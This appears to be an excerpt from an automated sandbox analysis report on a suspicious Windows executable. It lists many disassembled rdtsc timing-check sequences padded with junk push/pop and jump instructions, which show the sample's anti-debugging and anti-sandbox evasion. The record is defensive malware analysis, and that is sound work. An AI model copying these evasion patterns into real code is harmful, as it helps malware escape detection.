Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6C6E6 second address: D6C6EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6C6EA second address: D6C702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0F70ECA9A8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F0F70ECA9A6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D28E second address: D5D297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8103 second address: DD810C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8840 second address: DD8858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F0F7085C59Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8858 second address: DD885E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD885E second address: DD8871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8871 second address: DD887D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD887D second address: DD8881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD8BAA second address: DD8BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F70ECA9A6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDCD35 second address: DDCD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDCD3B second address: DDCD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDCD41 second address: DDCD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6247F second address: D624B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F70ECA9B7h 0x00000009 jmp 00007F0F70ECA9B8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D624B2 second address: D624B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA9F66 second address: DA9F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA9F6A second address: DA9F85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jl 00007F0F7085C5B4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA2B1 second address: DAA2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA2B8 second address: DAA2CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0F7085C596h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA771 second address: DAA775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA775 second address: DAA7B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F0F7085C5A9h 0x0000000f mov dx, 5641h 0x00000013 pop edx 0x00000014 push 00000004h 0x00000016 mov edx, 08B738B4h 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F0F7085C59Ch 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA7B3 second address: DAA7B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAA7B8 second address: DAA7BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAAFF5 second address: D8A77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F0F70ECA9ADh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0F70ECA9A8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D1877h], edi 0x0000002d call dword ptr [ebp+122D303Ch] 0x00000033 pushad 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDBF29 second address: DDBF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F0F7085C5B4h 0x0000000b pushad 0x0000000c jne 00007F0F7085C596h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC1D2 second address: DDC1F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007F0F70ECA9B7h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC5F5 second address: DDC636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A0h 0x00000007 jo 00007F0F7085C5AEh 0x0000000d jmp 00007F0F7085C59Dh 0x00000012 jmp 00007F0F7085C59Bh 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0F7085C59Dh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC636 second address: DDC644 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F70ECA9A8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC644 second address: DDC64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC8CE second address: DDC90F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F70ECA9A6h 0x00000008 jmp 00007F0F70ECA9B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0F70ECA9B7h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC90F second address: DDC913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6086 second address: DE60AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F0F70ECA9BCh 0x0000000b jmp 00007F0F70ECA9B6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE60AF second address: DE60B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE60B4 second address: DE60BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE5C0B second address: DE5C36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F0F7085C59Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE5C36 second address: DE5C5B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0F70ECA9B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0F70ECA9ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE8BDC second address: DE8BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jc 00007F0F7085C596h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE8614 second address: DE862B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0F70ECA9A6h 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F0F70ECA9A6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE878D second address: DE87BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F7085C5A2h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F7085C59Eh 0x00000014 jl 00007F0F7085C596h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED28B second address: DED2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9B6h 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F0F70ECA9A6h 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F0F70ECA9A6h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED2BE second address: DED2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED2C2 second address: DED2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F70ECA9AFh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC9E5 second address: DEC9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jno 00007F0F7085C596h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC9F5 second address: DECA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9AAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECA08 second address: DECA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECCDA second address: DECCDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0DAB second address: DF0DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007F0F7085C596h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F0F7085C59Ch 0x00000018 jnl 00007F0F7085C596h 0x0000001e popad 0x0000001f push esi 0x00000020 jmp 00007F0F7085C5A5h 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF011D second address: DF0123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0123 second address: DF0128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0128 second address: DF013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0F70ECA9A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF013A second address: DF0140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0267 second address: DF026B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF026B second address: DF0271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0271 second address: DF0277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0277 second address: DF0281 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F7085C59Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF0281 second address: DF02A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0F70ECA9B9h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF06DB second address: DF06F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF06F5 second address: DF071D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F70ECA9A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F0F70ECA9ACh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007F0F70ECA9A6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF071D second address: DF0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF09A4 second address: DF09B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F0F70ECA9A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF09B0 second address: DF09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65A63 second address: D65A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B8h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0F70ECA9A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65A8B second address: D65A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4809 second address: DF485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F0F70ECA9A8h 0x0000000b jng 00007F0F70ECA9EDh 0x00000011 pushad 0x00000012 jmp 00007F0F70ECA9B9h 0x00000017 jg 00007F0F70ECA9A6h 0x0000001d jmp 00007F0F70ECA9B0h 0x00000022 ja 00007F0F70ECA9A6h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c pop eax 0x0000002d jp 00007F0F70ECA9A6h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF499C second address: DF49C3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F7085C596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0F7085C59Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007F0F7085C596h 0x0000001c pop esi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4C70 second address: DF4C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4C76 second address: DF4C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA9AF second address: DAA9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA9B4 second address: DAA9BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5209 second address: DF5210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5D2B second address: DF5D30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5D30 second address: DF5D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9B7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F0F70ECA9A6h 0x00000015 jg 00007F0F70ECA9A6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB8A6 second address: DFB8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C59Ch 0x00000009 jp 00007F0F7085C596h 0x0000000f popad 0x00000010 push esi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02B6C second address: E02B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02CDF second address: E02CF7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F7085C59Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02CF7 second address: E02D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F70ECA9AFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0EA17 second address: E0EA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0EA24 second address: E0EA4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B9h 0x00000007 jnp 00007F0F70ECA9A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0EA4A second address: E0EA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D204 second address: E0D209 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D36D second address: E0D391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0F7085C5A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F0F7085C59Ah 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D53B second address: E0D543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D938 second address: E0D93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E8C9 second address: E0E8D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E8D1 second address: E0E8DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007F0F7085C596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C850 second address: E0C88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9B6h 0x00000009 popad 0x0000000a jmp 00007F0F70ECA9B5h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 js 00007F0F70ECA9A6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C88A second address: E0C88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C88E second address: E0C899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C899 second address: E0C8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C8AA second address: E0C8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
